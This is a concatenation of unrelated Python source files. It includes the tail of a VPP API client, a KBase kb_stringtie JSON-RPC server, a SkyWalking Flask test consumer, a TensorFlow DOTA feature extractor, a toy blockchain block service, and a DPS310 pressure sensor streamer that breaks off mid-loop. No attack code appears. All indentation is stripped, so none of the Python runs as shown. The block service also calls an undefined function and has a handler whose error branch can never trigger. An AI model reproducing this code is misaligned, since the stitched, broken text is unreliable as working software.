a long while about it you may provoke reply timeouts or cause
VPP to fill the RX buffer). Passing None will disable the
callback.
"""
self.event_callback = callback
def thread_msg_handler(self):
"""Python thread calling the user registered message handler.
This is to emulate the old style event callback scheme. Modern
clients should provide their own thread to poll the event
queue.
"""
while True:
r = self.message_queue.get()
if r == "terminate event thread":
break
msgname = type(r).__name__
if self.event_callback:
self.event_callback(msgname, r)
def __repr__(self):
return "<VPPApiClient apifiles=%s, testmode=%s, async_thread=%s, " \
"logger=%s, read_timeout=%s, use_socket=%s, " \
"server_address='%s'>" % (
self._apifiles, self.testmode, self.async_thread,
self.logger, self.read_timeout, self.use_socket,
self.server_address)
# Provide the old name for backward compatibility.
VPP = VPPApiClient
# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4
|
kb_stringtieServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from wsgiref.simple_server import make_server
import sys
import json
import traceback
import datetime
from multiprocessing import Process
from getopt import getopt, GetoptError
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError,\
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from os import environ
from ConfigParser import ConfigParser
from biokbase import log
import requests as _requests
import random as _random
import os
from kb_stringtie.authclient import KBaseAuth as _KBaseAuth
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'kb_stringtie'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from kb_stringtie.kb_stringtieImpl import kb_stringtie # noqa @IgnorePep8
impl_kb_stringtie = kb_stringtie(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if isinstance(e.message, basestring):
newerr.data = e.message
else:
# Some exceptions embed other exceptions as the message
newerr.data = repr(e.message)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if self.method_data[request['method']].has_key('types'): # noqa @IgnorePep8
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'kb_stringtie'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_kb_stringtie.run_stringtie_app,
name='kb_stringtie.run_stringtie_app',
types=[dict])
self.method_authentication['kb_stringtie.run_stringtie_app'] = 'required' # noqa
self.rpc_service.add(impl_kb_stringtie.status,
name='kb_stringtie.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'kb_stringtie ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception, e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print 'Request method was %s\n' % environ['REQUEST_METHOD']
# print 'Environment dictionary is:\n%s\n' % pprint.pformat(environ)
# print 'Request body was: %s' % request_body
# print 'Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result)
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print "Monkeypatching std libraries for async"
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Excecution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print "Listening on port %s" % port
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print str(err) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print "Host set to %s" % host
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print "Listening on port %s" % port
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
consumer.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import requests
from skywalking.decorators import runnable
if __name__ == '__main__':
from flask import Flask, jsonify
app = Flask(__name__)
@app.route('/users', methods=['POST', 'GET'])
def application():
from skywalking.trace.context import get_context
get_context().put_correlation('correlation', 'correlation')
@runnable(op='/test')
def post():
requests.post('http://provider:9091/users')
from threading import Thread
t = Thread(target=post)
t.start()
res = requests.post('http://provider:9091/users')
t.join()
return jsonify(res.json())
PORT = 9090
app.run(host='0.0.0.0', port=PORT, debug=True)
|
feature_extract_csl.py
|
# -*- coding:utf-8 -*-
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
import os
import sys
import tensorflow as tf
import cv2
import numpy as np
import math
from tqdm import tqdm
import argparse
from multiprocessing import Queue, Process
sys.path.append("../")
from libs.networks import build_whole_network_csl_tsne
from help_utils import tools
from libs.label_name_dict.label_dict import *
from libs.box_utils import draw_box_in_img
from libs.box_utils.coordinate_convert import forward_convert, backward_convert, coordinate_present_convert
from libs.box_utils import nms_rotate
from libs.box_utils.rotate_polygon_nms import rotate_gpu_nms
def worker(gpu_id, images, det_net, args, result_queue):
os.environ["CUDA_VISIBLE_DEVICES"] = str(gpu_id)
# 1. preprocess img
img_plac = tf.placeholder(dtype=tf.uint8, shape=[None, None, 3]) # is RGB. not BGR
img_batch = tf.cast(img_plac, tf.float32)
if cfgs.NET_NAME in ['resnet152_v1d', 'resnet101_v1d', 'resnet50_v1d']:
img_batch = (img_batch / 255 - tf.constant(cfgs.PIXEL_MEAN_)) / tf.constant(cfgs.PIXEL_STD)
else:
img_batch = img_batch - tf.constant(cfgs.PIXEL_MEAN)
img_batch = tf.expand_dims(img_batch, axis=0)
detection_boxes, detection_scores, detection_category, detection_boxes_angle, detection_boxes_angle_logits = det_net.build_whole_detection_network(
input_img_batch=img_batch,
gtboxes_batch_h=None,
gtboxes_batch_r=None,
gt_smooth_label=None)
init_op = tf.group(
tf.global_variables_initializer(),
tf.local_variables_initializer()
)
restorer, restore_ckpt = det_net.get_restorer()
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
with tf.Session(config=config) as sess:
sess.run(init_op)
if not restorer is None:
restorer.restore(sess, restore_ckpt)
print('restore model %d ...' % gpu_id)
for img_path in images:
# if 'P0968' not in img_path:
# continue
img = cv2.imread(img_path)
box_res_rotate = []
label_res_rotate = []
score_res_rotate = []
logits_res_rotate = []
imgH = img.shape[0]
imgW = img.shape[1]
img_short_side_len_list = cfgs.IMG_SHORT_SIDE_LEN if args.multi_scale else [cfgs.IMG_SHORT_SIDE_LEN]
if imgH < args.h_len:
temp = np.zeros([args.h_len, imgW, 3], np.float32)
temp[0:imgH, :, :] = img
img = temp
imgH = args.h_len
if imgW < args.w_len:
temp = np.zeros([imgH, args.w_len, 3], np.float32)
temp[:, 0:imgW, :] = img
img = temp
imgW = args.w_len
for hh in range(0, imgH, args.h_len - args.h_overlap):
if imgH - hh - 1 < args.h_len:
hh_ = imgH - args.h_len
else:
hh_ = hh
for ww in range(0, imgW, args.w_len - args.w_overlap):
if imgW - ww - 1 < args.w_len:
ww_ = imgW - args.w_len
else:
ww_ = ww
src_img = img[hh_:(hh_ + args.h_len), ww_:(ww_ + args.w_len), :]
for short_size in img_short_side_len_list:
max_len = cfgs.IMG_MAX_LENGTH
if args.h_len < args.w_len:
new_h, new_w = short_size, min(int(short_size * float(args.w_len) / args.h_len), max_len)
else:
new_h, new_w = min(int(short_size * float(args.h_len) / args.w_len), max_len), short_size
img_resize = cv2.resize(src_img, (new_w, new_h))
resized_img, det_boxes_r_, det_scores_r_, det_category_r_, det_angle_logits_ = \
sess.run(
[img_batch, detection_boxes_angle, detection_scores, detection_category, detection_boxes_angle_logits],
feed_dict={img_plac: img_resize[:, :, ::-1]}
)
resized_h, resized_w = resized_img.shape[1], resized_img.shape[2]
src_h, src_w = src_img.shape[0], src_img.shape[1]
if len(det_boxes_r_) > 0:
det_boxes_r_ = forward_convert(det_boxes_r_, False)
det_boxes_r_[:, 0::2] *= (src_w / resized_w)
det_boxes_r_[:, 1::2] *= (src_h / resized_h)
# det_boxes_r_ = backward_convert(det_boxes_r_, False)
for ii in range(len(det_boxes_r_)):
box_rotate = det_boxes_r_[ii]
box_rotate[0::2] = box_rotate[0::2] + ww_
box_rotate[1::2] = box_rotate[1::2] + hh_
box_res_rotate.append(box_rotate)
label_res_rotate.append(det_category_r_[ii])
score_res_rotate.append(det_scores_r_[ii])
logits_res_rotate.append(det_angle_logits_[ii])
box_res_rotate = np.array(box_res_rotate)
label_res_rotate = np.array(label_res_rotate)
score_res_rotate = np.array(score_res_rotate)
logits_res_rotate = np.array(logits_res_rotate)
box_res_rotate_ = []
label_res_rotate_ = []
score_res_rotate_ = []
logits_res_rotate_ = []
threshold = {'roundabout': 0.1, 'tennis-court': 0.3, 'swimming-pool': 0.1, 'storage-tank': 0.2,
'soccer-ball-field': 0.3, 'small-vehicle': 0.2, 'ship': 0.2, 'plane': 0.3,
'large-vehicle': 0.1, 'helicopter': 0.2, 'harbor': 0.0001, 'ground-track-field': 0.3,
'bridge': 0.0001, 'basketball-court': 0.3, 'baseball-diamond': 0.3}
for sub_class in range(1, cfgs.CLASS_NUM + 1):
index = np.where(label_res_rotate == sub_class)[0]
if len(index) == 0:
continue
tmp_boxes_r = box_res_rotate[index]
tmp_label_r = label_res_rotate[index]
tmp_score_r = score_res_rotate[index]
tmp_logits_r = logits_res_rotate[index]
tmp_boxes_r_ = backward_convert(tmp_boxes_r, False)
try:
inx = nms_rotate.nms_rotate_cpu(boxes=np.array(tmp_boxes_r_),
scores=np.array(tmp_score_r),
iou_threshold=threshold[LABEL_NAME_MAP[sub_class]],
max_output_size=5000)
except:
tmp_boxes_r_ = np.array(tmp_boxes_r_)
tmp = np.zeros([tmp_boxes_r_.shape[0], tmp_boxes_r_.shape[1] + 1])
tmp[:, 0:-1] = tmp_boxes_r_
tmp[:, -1] = np.array(tmp_score_r)
# Note: the IoU of two same rectangles is 0, which is calculated by rotate_gpu_nms
jitter = np.zeros([tmp_boxes_r_.shape[0], tmp_boxes_r_.shape[1] + 1])
jitter[:, 0] += np.random.rand(tmp_boxes_r_.shape[0], ) / 1000
inx = rotate_gpu_nms(np.array(tmp, np.float32) + np.array(jitter, np.float32),
float(threshold[LABEL_NAME_MAP[sub_class]]), 0)
box_res_rotate_.extend(np.array(tmp_boxes_r)[inx])
score_res_rotate_.extend(np.array(tmp_score_r)[inx])
label_res_rotate_.extend(np.array(tmp_label_r)[inx])
logits_res_rotate_.extend(np.array(tmp_logits_r)[inx])
result_dict = {'boxes': np.array(box_res_rotate_), 'scores': np.array(score_res_rotate_),
'labels': np.array(label_res_rotate_), 'logits': np.array(logits_res_rotate_),
'image_id': img_path}
result_queue.put_nowait(result_dict)
def test_dota(det_net, real_test_img_list, args, txt_name):
save_path = os.path.join('./test_dota', cfgs.VERSION)
nr_records = len(real_test_img_list)
pbar = tqdm(total=nr_records)
gpu_num = len(args.gpus.strip().split(','))
nr_image = math.ceil(nr_records / gpu_num)
result_queue = Queue(500)
procs = []
for i, gpu_id in enumerate(args.gpus.strip().split(',')):
start = i * nr_image
end = min(start + nr_image, nr_records)
split_records = real_test_img_list[start:end]
proc = Process(target=worker, args=(int(gpu_id), split_records, det_net, args, result_queue))
print('process:%d, start:%d, end:%d' % (i, start, end))
proc.start()
procs.append(proc)
log_dir = './csl_log/{}'.format(cfgs.VERSION)
tools.mkdir(log_dir)
fw_tsv = open(os.path.join(log_dir, 'csl_meta.tsv'), 'w')
# fw_tsv.write("Label\n")
final_logits = []
for i in range(nr_records):
res = result_queue.get()
if args.show_box:
nake_name = res['image_id'].split('/')[-1]
tools.mkdir(os.path.join(save_path, 'dota_img_vis'))
draw_path = os.path.join(save_path, 'dota_img_vis', nake_name)
draw_img = np.array(cv2.imread(res['image_id']), np.float32)
detected_boxes = backward_convert(res['boxes'], with_label=False)
detected_indices = res['scores'] >= cfgs.VIS_SCORE
detected_scores = res['scores'][detected_indices]
detected_boxes = detected_boxes[detected_indices]
detected_categories = res['labels'][detected_indices]
final_detections = draw_box_in_img.draw_boxes_with_label_and_scores(draw_img,
boxes=detected_boxes,
labels=detected_categories,
scores=detected_scores,
method=1,
head=np.ones_like(detected_scores) * -1,
is_csl=True,
in_graph=False)
cv2.imwrite(draw_path, final_detections)
else:
detected_indices = res['scores'] >= cfgs.VIS_SCORE
res['scores'] = res['scores'][detected_indices]
res['boxes'] = res['boxes'][detected_indices]
res['labels'] = res['labels'][detected_indices]
rboxes = backward_convert(res['boxes'], with_label=False)
rboxes = coordinate_present_convert(rboxes, -1, False)
rlogits = res['logits'][detected_indices]
for ii, rb in enumerate(rboxes):
fw_tsv.write("%d\n" % (int(rb[-1])))
final_logits.append(rlogits[ii])
fw = open(txt_name, 'a+')
fw.write('{}\n'.format(res['image_id'].split('/')[-1]))
fw.close()
pbar.set_description("Test image %s" % res['image_id'].split('/')[-1])
pbar.update(1)
for p in procs:
p.join()
fw_tsv.close()
final_logits = np.array(final_logits)
np.save(os.path.join(log_dir, "final_logits.npy"), final_logits)
def eval(num_imgs, args):
txt_name = '{}.txt'.format(cfgs.VERSION)
if not args.show_box:
if not os.path.exists(txt_name):
fw = open(txt_name, 'w')
fw.close()
fr = open(txt_name, 'r')
img_filter = fr.readlines()
print('****************************'*3)
print('Already tested imgs:', img_filter)
print('****************************'*3)
fr.close()
test_imgname_list = [os.path.join(args.test_dir, img_name) for img_name in os.listdir(args.test_dir)
if img_name.endswith(('.jpg', '.png', '.jpeg', '.tif', '.tiff')) and
(img_name + '\n' not in img_filter)]
else:
test_imgname_list = [os.path.join(args.test_dir, img_name) for img_name in os.listdir(args.test_dir)
if img_name.endswith(('.jpg', '.png', '.jpeg', '.tif', '.tiff'))]
assert len(test_imgname_list) != 0, 'test_dir has no imgs there.' \
' Note that, we only support img format of (.jpg, .png, and .tiff) '
if num_imgs == np.inf:
real_test_img_list = test_imgname_list
else:
real_test_img_list = test_imgname_list[: num_imgs]
csl = build_whole_network_csl_tsne.DetectionNetwork(base_network_name=cfgs.NET_NAME,
is_training=False)
test_dota(det_net=csl, real_test_img_list=real_test_img_list, args=args, txt_name=txt_name)
if not args.show_box:
os.remove(txt_name)
def parse_args():
parser = argparse.ArgumentParser('evaluate the result with Pascal2007 strand')
parser.add_argument('--test_dir', dest='test_dir',
help='evaluate imgs dir ',
default='/data/DOTA/test/images/', type=str)
parser.add_argument('--gpus', dest='gpus',
help='gpu id',
default='0,1,2,3,4,5,6,7', type=str)
parser.add_argument('--eval_num', dest='eval_num',
help='the num of eval imgs',
default=np.inf, type=int)
parser.add_argument('--show_box', '-s', default=False,
action='store_true')
parser.add_argument('--multi_scale', '-ms', default=False,
action='store_true')
parser.add_argument('--h_len', dest='h_len',
help='image height',
default=600, type=int)
parser.add_argument('--w_len', dest='w_len',
help='image width',
default=600, type=int)
parser.add_argument('--h_overlap', dest='h_overlap',
help='height overlap',
default=150, type=int)
parser.add_argument('--w_overlap', dest='w_overlap',
help='width overlap',
default=150, type=int)
args = parser.parse_args()
return args
if __name__ == '__main__':
args = parse_args()
print(20*"--")
print(args)
print(20*"--")
eval(args.eval_num,
args=args)
|
block_microservice.py
|
from multiprocessing import Process, Queue
import json
from time import time
from flask import Flask, jsonify, request
import requests
# Data Layer
def _load_ready_transactions():
with open('transactions_ready.json', 'r') as infile:
return json.load(infile)["transactions"]
# Bussiness Layer
def _create_block(transactions=None):
if transactions is None:
transactions = []
block = {
'timestamp': time(),
'transactions': transactions,
}
return block
# API Layer
def _worker_main(queue_: Queue):
while True:
print("The Queue has {} items to be processed:".format(queue_.qsize()))
queue_.get(True)
transactions = _load_ready_transactions()
block = _create_block(transactions)
requests.post('http://localhost:5003/mine', json={"block":block})
print("BackGround Process have finished processing ", transactions)
app = Flask(__name__)
@app.route('/block', methods=['GET'])
def mine():
queue.put(1)
response = {
'message': "New Block Forged",
}
return jsonify(response), 200
@app.route('/genesis', methods=['GET'])
def create_genesis_block():
try:
response = {'message': "Genesis Block Already Created"}
except FileNotFoundError:
genesis_block = _create_block()
response = {'message': "Genesis Block Created"}
store_not_minned_blocks({"blocks":[genesis_block]})
return jsonify(response), 200
if __name__ == "__main__":
queue = Queue()
p = Process(target=_worker_main, args=(queue,))
p.start()
app.run(port=5002)
|
DPS310_stream.py
|
from __future__ import print_function
import sys
import time
import threading
import serial
import atexit
import signal
import Queue
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
class PressureStreamer(serial.Serial):
def __init__(self,param):
self.param = param
port_param = {k:self.param[k] for k in ('baudrate', 'timeout')}
super(PressureStreamer,self).__init__(self.param['port'],**port_param)
self.lock = threading.Lock()
self.daq_thread = threading.Thread(target=self.read_data)
self.daq_thread.daemon = True
self.daq_queue = Queue.Queue()
signal.signal(signal.SIGINT,self.sigint_handler)
atexit.register(self.atexit)
while self.in_waiting > 0:
value = self.read()
self.running = False
self.t_list = []
self.data_list = []
self.live_plot = LivePlot(self.param)
def atexit(self):
print('quiting')
with self.lock:
self.write('e\n')
self.running = False
def sigint_handler(self,signum,frame):
with self.lock:
self.running = False
exit(0)
def read_data(self):
with self.lock:
running = self.running
start_t = self.start_t
while running:
with self.lock:
line = self.readline()
running = self.running
if line:
line = line.strip()
line = line.split(',')
values = [float(item) for item in line]
elapsed_t = time.time() - start_t
data_dict = {'elapsed_t': elapsed_t, 'values': values}
self.daq_queue.put(data_dict)
def run(self):
data_count = 0
# Start data stream
self.running = True
with self.lock:
self.write('b\n')
self.start_t = time.time()
self.daq_thread.start()
with open(self.param['datafile'],'w') as fid:
while True:
print('queue size: {} '.format(self.daq_queue.qsize()))
new_data = False
while True:
try:
data_dict = self.daq_queue.get_nowait()
new_data = True
except Queue.Empty:
break
# Write data to file
fid.write('{:0.3f} '.format(data_dict['elapsed_t']))
for i, value in enumerate(data_dict['values']):
fid.write('{:0.3f}'.format(value))
if i < len(data_dict['values']) -1:
fid.write(' ')
fid.write('\n')
# Append new items to time and data lists
data_count += 1
self.t_list.append(data_dict['elapsed_t'])
if not self.data_list:
self.data_list = [[value] for value in data_dict['values']]
else:
for value_list, value in zip(self.data_list, data_dict['values']):
value_list.append(value)
# Remove data older than t - t_window from t_list and data_list
if new_data and len(self.t_list) > 2:
